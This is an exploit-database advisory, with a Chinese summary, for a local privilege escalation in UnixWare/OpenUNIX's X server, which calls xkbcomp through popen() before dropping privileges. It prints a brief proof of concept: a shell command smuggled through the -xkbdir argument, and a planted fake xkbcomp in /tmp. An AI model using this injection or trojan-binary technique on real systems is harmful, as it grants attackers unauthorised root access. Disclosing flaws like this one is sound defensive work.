https://www.exploit-db.com/exploits/21758
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200209-066

UnixWare/OpenUNIX是由Caldera公司分发和维护的商业UNIX操作系统。UnixWare/OpenUNIX中的XServer调用了不安全的系统函数，本地攻击者可以利用这个漏洞以XServer进程权限在系统上执行任意命令。根据报告，UnixWare/OpenUNIX中的XServer在调用使用了不安全系统函数popen()的xkbcomp前没有丢弃特殊权限，攻击者可以提交包含元字符的任意系统命令，使得任意命令以XServer进程权限执行，造成权限提升。

source: http://www.securityfocus.com/bid/5575/info

Caldera's X Server implementation invokes external commands without dropping existing privilege levels. Xserver calls xkbcomp, and other related utilities, in an unsecure manner using the popen() or system() calls. While this would not typically be an issue, as execution of the binary would typically result in the execution of code in the security context of the invoking user, the xkbcomp utility is executed by the Xserver process before privileges are dropped.

This weakness can be exploited by local attacker to execute arbitrary commands with elevated privileges. 

$ Xserver -xkbdir 'id > /tmp/I_WAS_HERE;'
[exit X server]
$ grep root /tmp/I_WAS_HERE && echo 'Gotcha!'

$ cat > /tmp/xkbcomp
#!/bin/sh
id > /tmp/I_WAS_HERE
[ctrl+d]
$ chmod a+x /tmp/xkbcomp
$ Xserver -xkbdir /tmp
[X server executes /tmp/xkbcomp]

来源:BID
名称:5575
链接:http://www.securityfocus.com/bid/5575
来源:OSVDB
名称:5044
链接:http://www.osvdb.org/5044
来源:XF
名称:openunix-unixware-xsco-privileges(9976)
链接:http://www.iss.net/security_center/static/9976.php
来源:CALDERA
名称:CSSA-2002-SCO.38
链接:ftp://ftp.sco.com/pub/updates/OpenUNIX/CSSA-2002-SCO.38